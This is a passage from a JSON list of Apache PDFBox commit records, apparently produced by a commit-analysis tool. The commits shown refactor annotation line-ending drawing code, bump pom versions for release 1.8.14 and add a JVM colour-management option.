cs.moveTo(x, y - width * 3);", + "+ cs.lineTo(x, y + width * 3);", + "+ break;", + "+ case PDAnnotationLine.LE_DIAMOND:", + "+ drawDiamond(cs, x, y, width * 3);", + "+ break;", + "+ case PDAnnotationLine.LE_SQUARE:", + "+ cs.addRect(x - width * 3, y - width * 3, width * 6, width * 6);", + "+ break;", + "+ case PDAnnotationLine.LE_CIRCLE:", + "+ addCircle(cs, x, y, width * 3);", + "+ break;", + "+ case PDAnnotationLine.LE_R_OPEN_ARROW:", + "+ case PDAnnotationLine.LE_R_CLOSED_ARROW:", + "+ if (Float.compare(x, 0) != 0)", + "+ {", + "+ // ending", + "+ drawArrow(cs, x + width, y, width * 9);", + "+ }", + "+ else", + "+ {", + "+ // start", + "+ drawArrow(cs, -width, y, -width * 9);", + "+ }", + "+ if (PDAnnotationLine.LE_R_CLOSED_ARROW.equals(style))", + "+ {", + "+ cs.closePath();", + "+ }", + "+ break;", + "+ case PDAnnotationLine.LE_SLASH:", + "+ // the line is 18 x linewidth at an angle of 60\u00c2\u00b0", + "+ cs.moveTo(x + (float) (Math.cos(Math.toRadians(60)) * width * 9),", + "+ y + (float) (Math.sin(Math.toRadians(60)) * width * 9));", + "+ cs.lineTo(x + (float) (Math.cos(Math.toRadians(240)) * width * 9),", + "+ y + (float) (Math.sin(Math.toRadians(240)) * width * 9));", + "+ break;", + "+ default:", + "+ break;", + "+ }", + "+ if (INTERIOR_COLOR_STYLES.contains(style))", + "+ {", + "+ cs.drawShape(width, hasStroke, hasBackground);", + "+ }", + "+ else if (!PDAnnotationLine.LE_NONE.equals(style))", + "+ {", + "+ // need to do this separately, because sometimes /IC is set anyway", + "+ cs.drawShape(width, hasStroke, false);", + "+ }", + "+ }", + "+", + "+ /**", + "+ * Add the two arms of a horizontal arrow.", + "+ * ", + "+ * @param cs Content stream", + "+ * @param x", + "+ * @param y", + "+ * @param len The arm length. Positive goes to the right, negative goes to the left.", + "+ * ", + "+ * @throws IOException If the content stream could not be written", + "+ */", + "+ void drawArrow(PDAppearanceContentStream cs, float x, float y, float len) throws IOException", + "+ {", + "+ // strategy for arrows: angle 30\u00c2\u00b0, arrow arm length = 9 * line width", + "+ // cos(angle) = x position", + "+ // sin(angle) = y position", + "+ // this comes very close to what Adobe is doing", + "+ cs.moveTo(x + (float) (Math.cos(ARROW_ANGLE) * len), y + (float) (Math.sin(ARROW_ANGLE) * len));", + "+ cs.lineTo(x, y);", + "+ cs.lineTo(x + (float) (Math.cos(ARROW_ANGLE) * len), y - (float) (Math.sin(ARROW_ANGLE) * len));", + "+ }", + "+", + "+ /**", + "+ * Add a square diamond shape (corner on top) to the path.", + "+ *", + "+ * @param cs Content stream", + "+ * @param x", + "+ * @param y", + "+ * @param r Radius (to a corner)", + "+ * ", + "+ * @throws IOException If the content stream could not be written", + "+ */", + "+ void drawDiamond(PDAppearanceContentStream cs, float x, float y, float r) throws IOException", + "+ {", + "+ cs.moveTo(x - r, y);", + "+ cs.lineTo(x, y + r);", + "+ cs.lineTo(x + r, y);", + "+ cs.lineTo(x, y - r);", + "+ cs.closePath();", + "+ }", + "+", + "+ /**", + "+ * Add a circle shape to the path.", + "+ *", + "+ * @param cs Content stream", + "+ * @param x", + "+ * @param y", + "+ * @param r Radius", + "+ * ", + "+ * @throws IOException If the content stream could not be written", + "+ */", + "+ void addCircle(PDAppearanceContentStream cs, float x, float y, float r) throws IOException", + "+ {", + "+ // http://stackoverflow.com/a/2007782/535646", + "+ float magic = r * 0.551784f;", + "+ cs.moveTo(x, y + r);", + "+ cs.curveTo(x + magic, y + r, x + r, y + magic, x + r, y);", + "+ cs.curveTo(x + r, y - magic, x + magic, y - r, x, y - r);", + "+ cs.curveTo(x - magic, y - r, x - r, y - magic, x - r, y);", + "+ cs.curveTo(x - r, y + magic, x - magic, y + r, x, y + r);", + "+ cs.closePath();", + "+ }", + "+", + " /**", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", + "index 36bf7552c..ac6ef2215 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", + "@@ -36,3 +36,2 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", + "- static final double ARROW_ANGLE = Math.toRadians(30);", + " static final int FONT_SIZE = 9;", + "@@ -253,6 +252,5 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", + "- // do this here and not before showing the text, or the text would appear in the", + "- // interior color", + "+ // paint the styles here and not before showing the text, or the text would appear", + "+ // with the interior color", + " boolean hasBackground = cs.setNonStrokingColorOnDemand(annotation.getInteriorColor());", + "- ", + " drawStyle(annotation.getStartPointEndingStyle(), cs, 0, y, ab.width, hasStroke, hasBackground);", + "@@ -267,137 +265,2 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", + "- private void drawStyle(String style, final PDAppearanceContentStream cs, float x, float y,", + "- float width, boolean hasStroke, boolean hasBackground) throws IOException", + "- {", + "- switch (style)", + "- {", + "- case PDAnnotationLine.LE_OPEN_ARROW:", + "- case PDAnnotationLine.LE_CLOSED_ARROW:", + "- if (Float.compare(x, 0) != 0)", + "- {", + "- // ending", + "- drawArrow(cs, x - width, y, -width * 9);", + "- }", + "- else", + "- {", + "- // start", + "- drawArrow(cs, width, y, width * 9);", + "- }", + "- if (PDAnnotationLine.LE_CLOSED_ARROW.equals(style))", + "- {", + "- cs.closePath();", + "- }", + "- break;", + "- case PDAnnotationLine.LE_BUTT:", + "- cs.moveTo(x, y - width * 3);", + "- cs.lineTo(x, y + width * 3);", + "- break;", + "- case PDAnnotationLine.LE_DIAMOND:", + "- drawDiamond(cs, x, y, width * 3);", + "- break;", + "- case PDAnnotationLine.LE_SQUARE:", + "- cs.addRect(x - width * 3, y - width * 3, width * 6, width * 6);", + "- break;", + "- case PDAnnotationLine.LE_CIRCLE:", + "- addCircle(cs, x, y, width * 3);", + "- break;", + "- case PDAnnotationLine.LE_R_OPEN_ARROW:", + "- case PDAnnotationLine.LE_R_CLOSED_ARROW:", + "- if (Float.compare(x, 0) != 0)", + "- {", + "- // ending", + "- drawArrow(cs, x + width, y, width * 9);", + "- }", + "- else", + "- {", + "- // start", + "- drawArrow(cs, -width, y, -width * 9);", + "- }", + "- if (PDAnnotationLine.LE_R_CLOSED_ARROW.equals(style))", + "- {", + "- cs.closePath();", + "- }", + "- break;", + "- case PDAnnotationLine.LE_SLASH:", + "- // the line is 18 x linewidth at an angle of 60\u00c2\u00b0", + "- cs.moveTo(x + (float) (Math.cos(Math.toRadians(60)) * width * 9),", + "- y + (float) (Math.sin(Math.toRadians(60)) * width * 9));", + "- cs.lineTo(x + (float) (Math.cos(Math.toRadians(240)) * width * 9),", + "- y + (float) (Math.sin(Math.toRadians(240)) * width * 9));", + "- break;", + "- default:", + "- break;", + "- }", + "- if (INTERIOR_COLOR_STYLES.contains(style))", + "- {", + "- cs.drawShape(width, hasStroke, hasBackground);", + "- }", + "- else if (!PDAnnotationLine.LE_NONE.equals(style))", + "- {", + "- // need to do this separately, because sometimes /IC is set anyway", + "- cs.drawShape(width, hasStroke, false);", + "- }", + "- }", + "-", + "- /**", + "- * Add the two arms of a horizontal arrow.", + "- * ", + "- * @param cs Content stream", + "- * @param x", + "- * @param y", + "- * @param len The arm length. Positive goes to the right, negative goes to the left.", + "- * ", + "- * @throws IOException If the content stream could not be written", + "- */", + "- private void drawArrow(PDAppearanceContentStream cs, float x, float y, float len) throws IOException", + "- {", + "- // strategy for arrows: angle 30\u00c2\u00b0, arrow arm length = 9 * line width", + "- // cos(angle) = x position", + "- // sin(angle) = y position", + "- // this comes very close to what Adobe is doing", + "- cs.moveTo(x + (float) (Math.cos(ARROW_ANGLE) * len), y + (float) (Math.sin(ARROW_ANGLE) * len));", + "- cs.lineTo(x, y);", + "- cs.lineTo(x + (float) (Math.cos(ARROW_ANGLE) * len), y - (float) (Math.sin(ARROW_ANGLE) * len));", + "- }", + "-", + "- /**", + "- * Add a square diamond shape (corner on top) to the path.", + "- *", + "- * @param cs Content stream", + "- * @param x", + "- * @param y", + "- * @param r Radius (to a corner)", + "- * ", + "- * @throws IOException If the content stream could not be written", + "- */", + "- private void drawDiamond(PDAppearanceContentStream cs, float x, float y, float r) throws IOException", + "- {", + "- cs.moveTo(x - r, y);", + "- cs.lineTo(x, y + r);", + "- cs.lineTo(x + r, y);", + "- cs.lineTo(x, y - r);", + "- cs.closePath();", + "- }", + "-", + "- /**", + "- * Add a circle shape to the path.", + "- *", + "- * @param cs Content stream", + "- * @param x", + "- * @param y", + "- * @param r Radius", + "- * ", + "- * @throws IOException If the content stream could not be written", + "- */", + "- private void addCircle(PDAppearanceContentStream cs, float x, float y, float r) throws IOException", + "- {", + "- // http://stackoverflow.com/a/2007782/535646", + "- float magic = r * 0.551784f;", + "- cs.moveTo(x, y + r);", + "- cs.curveTo(x + magic, y + r, x + r, y + magic, x + r, y);", + "- cs.curveTo(x + r, y - magic, x + magic, y - r, x, y - r);", + "- cs.curveTo(x - magic, y - r, x - r, y - magic, x - r, y);", + "- cs.curveTo(x - r, y + magic, x - magic, y + r, x, y + r);", + "- cs.closePath();", + "- }", + "-", + " @Override", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", + "index 74f4bfc06..ebfa3b402 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", + "@@ -30,7 +30,4 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationPolyline;", + " import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", + "-import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationLine;", + " import static org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationLine.LE_NONE;", + " import org.apache.pdfbox.pdmodel.interactive.annotation.PDBorderStyleDictionary;", + "-import static org.apache.pdfbox.pdmodel.interactive.annotation.handlers.PDAbstractAppearanceHandler.INTERIOR_COLOR_STYLES;", + "-import static org.apache.pdfbox.pdmodel.interactive.annotation.handlers.PDLineAppearanceHandler.ARROW_ANGLE;", + " import org.apache.pdfbox.util.Matrix;", + "@@ -159,3 +156,3 @@ public class PDPolylineAppearanceHandler extends PDAbstractAppearanceHandler", + "- // this must be done after polyline draw, to avoid line crossing a filled shape", + "+ // paint the styles here and after polyline draw, to avoid line crossing a filled shape", + " if (!LE_NONE.equals(annotation.getStartPointEndingStyle()))", + "@@ -249,140 +246,2 @@ public class PDPolylineAppearanceHandler extends PDAbstractAppearanceHandler", + " }", + "-", + "- //TODO refactor to remove double code drawStyle and related", + "- // (100% copied from line handler)", + "-", + "- private void drawStyle(String style, final PDAppearanceContentStream cs, float x, float y,", + "- float width, boolean hasStroke, boolean hasBackground) throws IOException", + "- {", + "- switch (style)", + "- {", + "- case PDAnnotationLine.LE_OPEN_ARROW:", + "- case PDAnnotationLine.LE_CLOSED_ARROW:", + "- if (Float.compare(x, 0) != 0)", + "- {", + "- // ending", + "- drawArrow(cs, x - width, y, -width * 9);", + "- }", + "- else", + "- {", + "- // start", + "- drawArrow(cs, width, y, width * 9);", + "- }", + "- if (PDAnnotationLine.LE_CLOSED_ARROW.equals(style))", + "- {", + "- cs.closePath();", + "- }", + "- break;", + "- case PDAnnotationLine.LE_BUTT:", + "- cs.moveTo(x, y - width * 3);", + "- cs.lineTo(x, y + width * 3);", + "- break;", + "- case PDAnnotationLine.LE_DIAMOND:", + "- drawDiamond(cs, x, y, width * 3);", + "- break;", + "- case PDAnnotationLine.LE_SQUARE:", + "- cs.addRect(x - width * 3, y - width * 3, width * 6, width * 6);", + "- break;", + "- case PDAnnotationLine.LE_CIRCLE:", + "- addCircle(cs, x, y, width * 3);", + "- break;", + "- case PDAnnotationLine.LE_R_OPEN_ARROW:", + "- case PDAnnotationLine.LE_R_CLOSED_ARROW:", + "- if (Float.compare(x, 0) != 0)", + "- {", + "- // ending", + "- drawArrow(cs, x + width, y, width * 9);", + "- }", + "- else", + "- {", + "- // start", + "- drawArrow(cs, -width, y, -width * 9);", + "- }", + "- if (PDAnnotationLine.LE_R_CLOSED_ARROW.equals(style))", + "- {", + "- cs.closePath();", + "- }", + "- break;", + "- case PDAnnotationLine.LE_SLASH:", + "- // the line is 18 x linewidth at an angle of 60\u00c2\u00b0", + "- cs.moveTo(x + (float) (Math.cos(Math.toRadians(60)) * width * 9),", + "- y + (float) (Math.sin(Math.toRadians(60)) * width * 9));", + "- cs.lineTo(x + (float) (Math.cos(Math.toRadians(240)) * width * 9),", + "- y + (float) (Math.sin(Math.toRadians(240)) * width * 9));", + "- break;", + "- default:", + "- break;", + "- }", + "- if (INTERIOR_COLOR_STYLES.contains(style))", + "- {", + "- cs.drawShape(width, hasStroke, hasBackground);", + "- }", + "- else if (!PDAnnotationLine.LE_NONE.equals(style))", + "- {", + "- // need to do this separately, because sometimes /IC is set anyway", + "- cs.drawShape(width, hasStroke, false);", + "- }", + "- }", + "-", + "- /**", + "- * Add the two arms of a horizontal arrow.", + "- * ", + "- * @param cs Content stream", + "- * @param x", + "- * @param y", + "- * @param len The arm length. Positive goes to the right, negative goes to the left.", + "- * ", + "- * @throws IOException If the content stream could not be written", + "- */", + "- private void drawArrow(PDAppearanceContentStream cs, float x, float y, float len) throws IOException", + "- {", + "- // strategy for arrows: angle 30\u00c2\u00b0, arrow arm length = 9 * line width", + "- // cos(angle) = x position", + "- // sin(angle) = y position", + "- // this comes very close to what Adobe is doing", + "- cs.moveTo(x + (float) (Math.cos(ARROW_ANGLE) * len), y + (float) (Math.sin(ARROW_ANGLE) * len));", + "- cs.lineTo(x, y);", + "- cs.lineTo(x + (float) (Math.cos(ARROW_ANGLE) * len), y - (float) (Math.sin(ARROW_ANGLE) * len));", + "- }", + "-", + "- /**", + "- * Add a square diamond shape (corner on top) to the path.", + "- *", + "- * @param cs Content stream", + "- * @param x", + "- * @param y", + "- * @param r Radius (to a corner)", + "- * ", + "- * @throws IOException If the content stream could not be written", + "- */", + "- private void drawDiamond(PDAppearanceContentStream cs, float x, float y, float r) throws IOException", + "- {", + "- cs.moveTo(x - r, y);", + "- cs.lineTo(x, y + r);", + "- cs.lineTo(x + r, y);", + "- cs.lineTo(x, y - r);", + "- cs.closePath();", + "- }", + "-", + "- /**", + "- * Add a circle shape to the path.", + "- *", + "- * @param cs Content stream", + "- * @param x", + "- * @param y", + "- * @param r Radius", + "- * ", + "- * @throws IOException If the content stream could not be written", + "- */", + "- private void addCircle(PDAppearanceContentStream cs, float x, float y, float r) throws IOException", + "- {", + "- // http://stackoverflow.com/a/2007782/535646", + "- float magic = r * 0.551784f;", + "- cs.moveTo(x, y + r);", + "- cs.curveTo(x + magic, y + r, x + r, y + magic, x + r, y);", + "- cs.curveTo(x + r, y - magic, x + magic, y - r, x, y - r);", + "- cs.curveTo(x - magic, y - r, x - r, y - magic, x - r, y);", + "- cs.curveTo(x - r, y + magic, x - magic, y + r, x, y + r);", + "- cs.closePath();", + "- }", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "656ad4104ce39521d4040b08826b9bf729a91c57", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1523900987, + "hunks": 17, + "message": "[maven-release-plugin] prepare release 1.8.14 git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/1.8@1829305 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/ant/pom.xml b/ant/pom.xml", + "index 8ac09774b..a748e9097 100644", + "--- a/ant/pom.xml", + "+++ b/ant/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 1.8.14-SNAPSHOT", + "+ 1.8.14", + " ../parent/pom.xml", + "diff --git a/app/pom.xml b/app/pom.xml", + "index a77629018..d92ee8482 100644", + "--- a/app/pom.xml", + "+++ b/app/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 1.8.14-SNAPSHOT", + "+ 1.8.14", + " ../parent/pom.xml", + "diff --git a/examples/pom.xml b/examples/pom.xml", + "index 3bfb8beff..6934a644d 100644", + "--- a/examples/pom.xml", + "+++ b/examples/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 1.8.14-SNAPSHOT", + "+ 1.8.14", + " ../parent/pom.xml", + "diff --git a/fontbox/pom.xml b/fontbox/pom.xml", + "index 2713b99dc..ac21d2020 100644", + "--- a/fontbox/pom.xml", + "+++ b/fontbox/pom.xml", + "@@ -23,3 +23,3 @@", + " pdfbox-parent", + "- 1.8.14-SNAPSHOT", + "+ 1.8.14", + " ../parent/pom.xml", + "diff --git a/jempbox/pom.xml b/jempbox/pom.xml", + "index ad65c38fd..2d8ea5c43 100644", + "--- a/jempbox/pom.xml", + "+++ b/jempbox/pom.xml", + "@@ -23,3 +23,3 @@", + " pdfbox-parent", + "- 1.8.14-SNAPSHOT", + "+ 1.8.14", + " ../parent/pom.xml", + "diff --git a/lucene/pom.xml b/lucene/pom.xml", + "index 22f3efc4e..4ed039065 100644", + "--- a/lucene/pom.xml", + "+++ b/lucene/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 1.8.14-SNAPSHOT", + "+ 1.8.14", + " ../parent/pom.xml", + "diff --git a/parent/pom.xml b/parent/pom.xml", + "index f50b5fb99..677b6a4b0 100644", + "--- a/parent/pom.xml", + "+++ b/parent/pom.xml", + "@@ -31,3 +31,3 @@", + " pdfbox-parent", + "- 1.8.14-SNAPSHOT", + "+ 1.8.14", + " pom", + "@@ -321,5 +321,5 @@", + " ", + "- scm:svn:http://svn.apache.org/repos/asf/maven/pom/branches/1.8/pdfbox-parent", + "- scm:svn:https://svn.apache.org/repos/asf/maven/pom/branches/1.8/pdfbox-parent", + "- http://svn.apache.org/viewvc/maven/pom/branches/1.8/pdfbox-parent", + "+ scm:svn:http://svn.apache.org/repos/asf/maven/pom/tags/1.8.14/pdfbox-parent", + "+ scm:svn:https://svn.apache.org/repos/asf/maven/pom/tags/1.8.14/pdfbox-parent", + "+ http://svn.apache.org/viewvc/maven/pom/tags/1.8.14/pdfbox-parent", + " ", + "diff --git a/pdfbox/pom.xml b/pdfbox/pom.xml", + "index 7c050baff..03c86c52b 100644", + "--- a/pdfbox/pom.xml", + "+++ b/pdfbox/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 1.8.14-SNAPSHOT", + "+ 1.8.14", + " ../parent/pom.xml", + "diff --git a/pom.xml b/pom.xml", + "index 71f4fcc77..bcd3617a6 100644", + "--- a/pom.xml", + "+++ b/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 1.8.14-SNAPSHOT", + "+ 1.8.14", + " parent/pom.xml", + "@@ -36,8 +36,8 @@", + " ", + "- scm:svn:http://svn.apache.org/repos/asf/pdfbox/branches/1.8", + "+ scm:svn:http://svn.apache.org/repos/asf/pdfbox/tags/1.8.14", + " ", + " ", + "- scm:svn:https://svn.apache.org/repos/asf/pdfbox/branches/1.8", + "+ scm:svn:https://svn.apache.org/repos/asf/pdfbox/tags/1.8.14", + " ", + "- http://svn.apache.org/viewvc/pdfbox/branches/1.8", + "+ http://svn.apache.org/viewvc/pdfbox/tags/1.8.14", + " ", + "diff --git a/preflight-app/pom.xml b/preflight-app/pom.xml", + "index 48ba66e1b..49464a5ae 100644", + "--- a/preflight-app/pom.xml", + "+++ b/preflight-app/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 1.8.14-SNAPSHOT", + "+ 1.8.14", + " ../parent/pom.xml", + "diff --git a/preflight/pom.xml b/preflight/pom.xml", + "index 7731012a7..15e8ec381 100644", + "--- a/preflight/pom.xml", + "+++ b/preflight/pom.xml", + "@@ -28,3 +28,3 @@", + " \t\tpdfbox-parent", + "-\t\t1.8.14-SNAPSHOT", + "+\t\t1.8.14", + " \t\t../parent/pom.xml", + "diff --git a/war/pom.xml b/war/pom.xml", + "index 0bf5f0e7b..bedaa496e 100644", + "--- a/war/pom.xml", + "+++ b/war/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 1.8.14-SNAPSHOT", + "+ 1.8.14", + " ../parent/pom.xml", + "diff --git a/xmpbox/pom.xml b/xmpbox/pom.xml", + "index 039db8267..59af6eb8d 100644", + "--- a/xmpbox/pom.xml", + "+++ b/xmpbox/pom.xml", + "@@ -29,3 +29,3 @@", + " \t\tpdfbox-parent", + "-\t\t1.8.14-SNAPSHOT", + "+\t\t1.8.14", + " \t\t../parent/pom.xml" + ], + "changed_files": [ + "ant/pom.xml", + "app/pom.xml", + "examples/pom.xml", + "fontbox/pom.xml", + "jempbox/pom.xml", + "lucene/pom.xml", + "parent/pom.xml", + "pdfbox/pom.xml", + "pom.xml", + "preflight-app/pom.xml", + "preflight/pom.xml", + "war/pom.xml", + "xmpbox/pom.xml" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "d24d2fa3234b678eec36c45bb0bb8d38b46dedc6" + ] + ], + "tags": [ + "1.8.14", + "1.8.15", + "1.8.16", + "1.8.17" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + } + ] + }, + { + "commit_id": "97568988e2514f1c5aced9c93cef82c0a408cdf6", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1526743307, + "hunks": 5, + "message": "PDFBOX-3353: move styles sets up to abstract class because it will also be used by polyline handler git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1831900 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", + "index 94556f985..72626ee53 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", + "@@ -21,2 +21,5 @@ import java.awt.geom.AffineTransform;", + " import java.io.IOException;", + "+import java.util.Collections;", + "+import java.util.HashSet;", + "+import java.util.Set;", + "@@ -30,2 +33,3 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationSquareCircle", + " import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", + "+import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationLine;", + " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceDictionary;", + "@@ -44,3 +48,35 @@ public abstract class PDAbstractAppearanceHandler implements PDAppearanceHandler", + " private final PDAnnotation annotation;", + "- ", + "+", + "+ /**", + "+ * Line ending styles where the line has to be drawn shorter (minus line width).", + "+ */", + "+ protected static final Set SHORT_STYLES = createShortStyles();", + "+", + "+ /**", + "+ * Line ending styles where there is an interior color.", + "+ */", + "+ protected static final Set INTERIOR_COLOR_STYLES = createInteriorColorStyles();", + "+", + "+ private static Set createShortStyles()", + "+ {", + "+ Set shortStyles = new HashSet<>();", + "+ shortStyles.add(PDAnnotationLine.LE_OPEN_ARROW);", + "+ shortStyles.add(PDAnnotationLine.LE_CLOSED_ARROW);", + "+ shortStyles.add(PDAnnotationLine.LE_SQUARE);", + "+ shortStyles.add(PDAnnotationLine.LE_CIRCLE);", + "+ shortStyles.add(PDAnnotationLine.LE_DIAMOND);", + "+ return Collections.unmodifiableSet(shortStyles);", + "+ }", + "+", + "+ private static Set createInteriorColorStyles()", + "+ {", + "+ Set interiorColorStyles = new HashSet<>();", + "+ interiorColorStyles.add(PDAnnotationLine.LE_CLOSED_ARROW);", + "+ interiorColorStyles.add(PDAnnotationLine.LE_CIRCLE);", + "+ interiorColorStyles.add(PDAnnotationLine.LE_DIAMOND);", + "+ interiorColorStyles.add(PDAnnotationLine.LE_R_CLOSED_ARROW);", + "+ interiorColorStyles.add(PDAnnotationLine.LE_SQUARE);", + "+ return Collections.unmodifiableSet(interiorColorStyles);", + "+ }", + "+", + " public PDAbstractAppearanceHandler(PDAnnotation annotation)", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", + "index 51aaca1b4..340de6643 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", + "@@ -19,4 +19,2 @@ package org.apache.pdfbox.pdmodel.interactive.annotation.handlers;", + " import java.io.IOException;", + "-import java.util.HashSet;", + "-import java.util.Set;", + " import org.apache.commons.logging.Log;", + "@@ -41,27 +39,2 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", + "- /**", + "- * styles where the line has to be drawn shorter (minus line width).", + "- */", + "- private static final Set SHORT_STYLES = new HashSet<>();", + "-", + "- /**", + "- * styles where there is an interior color.", + "- */", + "- private static final Set INTERIOR_COLOR_STYLES = new HashSet<>();", + "-", + "- static", + "- {", + "- SHORT_STYLES.add(PDAnnotationLine.LE_OPEN_ARROW);", + "- SHORT_STYLES.add(PDAnnotationLine.LE_CLOSED_ARROW);", + "- SHORT_STYLES.add(PDAnnotationLine.LE_SQUARE);", + "- SHORT_STYLES.add(PDAnnotationLine.LE_CIRCLE);", + "- SHORT_STYLES.add(PDAnnotationLine.LE_DIAMOND);", + "-", + "- INTERIOR_COLOR_STYLES.add(PDAnnotationLine.LE_CLOSED_ARROW);", + "- INTERIOR_COLOR_STYLES.add(PDAnnotationLine.LE_CIRCLE);", + "- INTERIOR_COLOR_STYLES.add(PDAnnotationLine.LE_DIAMOND);", + "- INTERIOR_COLOR_STYLES.add(PDAnnotationLine.LE_R_CLOSED_ARROW);", + "- INTERIOR_COLOR_STYLES.add(PDAnnotationLine.LE_SQUARE);", + "- }", + "-", + " public PDLineAppearanceHandler(PDAnnotation annotation)" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "c745b2217ecc5d60c625321db56a4e49173f78e8", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1523478190, + "hunks": 1, + "message": "PDFBOX-4071: add option to use KCMS git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/1.8@1828933 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/pom.xml b/pdfbox/pom.xml", + "index 2e5cadccd..7c050baff 100644", + "--- a/pdfbox/pom.xml", + "+++ b/pdfbox/pom.xml", + "@@ -136,3 +136,3 @@", + " ", + "- -Xmx128m", + "+ -Xmx128m -Dsun.java2d.cmm=sun.java2d.cmm.kcms.KcmsServiceProvider", + " " + ], + "changed_files": [ + "pdfbox/pom.xml" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4071": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "1.8.14", + "1.8.15", + "1.8.16", + "1.8.17" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4071", + "relevance": 2 + } + ] + }, + { + "commit_id": "d7f5d548ac1d0bcb6443d5642036f7bee719684d", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1529687862, + "hunks": 1, + "message": "PDFBOX-3353: add constants git-svn-id: 